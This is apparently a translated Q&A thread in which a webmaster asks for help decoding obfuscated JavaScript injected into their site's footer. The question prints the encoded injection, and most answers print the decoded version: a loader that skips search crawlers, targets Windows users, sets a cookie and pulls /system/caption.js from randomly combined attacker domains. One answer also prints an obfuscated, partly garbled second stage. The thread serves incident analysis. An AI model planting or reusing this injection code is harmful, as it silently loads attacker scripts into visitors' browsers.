12

我将以下内容注入到我的一个站点的页脚中,并且为了解决更大的谜团(“它是如何发生的”),我正在尝试对其进行解码。有任何想法吗?

这是代码:

<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
4

10 回答 10

15

您可以使用此工具对字符串进行解码。将字符串转换选项设置为URLDecode。然后你可以用js beautifier 来美化它。

因为我是一个好奇的人,所以我看了一下输出。caption.js它正在从一个半随机域向您的页面写入一个新文件。有 2 个 URL 段数组用于构建完整的域,所以我想说你有一些东西可以使用。

于 2010-08-02T20:52:06.847 回答
7 
<script language="javascript" type="text/javascript">
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
</script>

因此,将来自 (eg ) 的子域添加到来自e(eg vagi.) 的域名,并从该域 (eg d)myads.name加载脚本。/system/caption.jshttp://vagi.myads.name/system/caption.js

于 2010-08-02T20:53:00.183 回答
2 
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};

代码正在加载带有 cookie 集的随机 subdomain-sld 组合,以加载不安全的内容。

于 2010-08-02T20:55:07.653 回答
1

所有这些数字都是 ASCII 字符的十六进制值。当调用 unescape 时,它​​们会变成真正的角色。例如 %3C 是 '<'。

为什么不使用消息框来显示 unescape(...) 的输出

于 2010-08-02T20:52:52.523 回答
1

您可以在这里使用十六进制解码器:http: //home2.paulschou.net/tools/xlate/ 代码是

<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
于 2010-08-02T20:54:02.723 回答
1 
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; 
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],
    e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";
expires="+dt.toGMTString()+";
path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>
于 2010-08-02T20:54:07.750 回答
1

这是一个 URLDecoder: http://meyerweb.com/eric/tools/dencoder/

以及它编写的代码:

<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>

好的,所以这不太有用。如果用户没有名为“holycookie”的cookie并且不是谷歌机器人,它似乎会插入另一个JS文件。其中大部分只是选择从哪个域名获取有效负载的垃圾。

于 2010-08-02T20:54:33.240 回答
1

您发布的代码解码为


var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
    var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
        e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
    document.write('')
};

如果满足 if 条件,它反过来从以伪随机方式组成的 url 加载代码。

例如,如果您打开http://vain.adsnet.biz/system/caption.js ,您将看到以下 javascript 代码。

我把解释留给你,但它看起来很无害。


function tT() {};
var yWP = new Array();
tT.prototype = {
    h: function () {
        this.i = "";
        var nH = function () {};
        var tE = 30295;
        var u = "";
        zB = false;
        this.a = '';
        this.eY = 29407;
        var z = document;
        vD = "vD";
        var gT = "gT";
        var oG = '';
        var lF = '';
        fU = "fU";
        var q = function () {
            return 'q'
        };
        var c = window;
        var m = function () {
            return 'm'
        };
        var kS = "kS";
        this.b = "";
        this.p = 29430;
        var j = this;
        dL = "";
        var cC = new Date();
        cQ = 33459;
        var uY = "uY";
        var vO = function () {};
        zN = "zN";
        jIZ = '';
        var mH = 21601;
        String.prototype.lP = function (v, hF) {
            var t = this;
            return t.replace(v, hF)
        };
        var nA = "";
        this.xK = 48622;
        zG = "";
        var kF = function () {};

        function aF() {};
        var mI = function () {};
        var oY = '';
        var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, '');
        var iN = new Array();
        mJ = "mJ";
        aW = "aW";
        var hU = "hU";
        this.kC = 28044;
        var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, ''));
        var cJ = function () {};
        var tX = false;
        this.xHX = false;

        function jP() {};
        var eZ = 16039;
        bQ = "bQ";
        var eSM = new Date();
        c[g](function () {
            j.h()
        }, 384);
        this.xR = "";
        var jB = function () {
            return 'jB'
        };
        var fP = function () {
            return 'fP'
        };
        var bX = new Array();
    }
    function iLD() {};
    var mQ = function () {};
    var wZV = "";this.eK = 5506;
}
};
fO = 30941;
var hW = new tT();
wU = 40956;
hW.h();
hZ = "hZ";

你怎么能自己做到这一点?URLDecode + jsbeautifier 或 jsunpack 足以做到这一点;)

于 2010-08-02T21:04:55.480 回答
1

使用“版本控制”,这样将来就不会发生这种情况。一个好的构建完成后,一切都如您所愿,离线时将其保存到外部硬盘驱动器。

你最近有没有做过让一位程序员同事不高兴的事情?

于 2018-01-26T02:06:18.753 回答
0

使用 php 函数 rawurldecode

   <script language="javascript" type="text/javascript">
    var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
    if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
    var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
    dt=new Date;
    dt.setTime(dt.getTime()+9072E4);
    document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; 
    document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
    </script>
于 2010-08-02T21:17:29.790 回答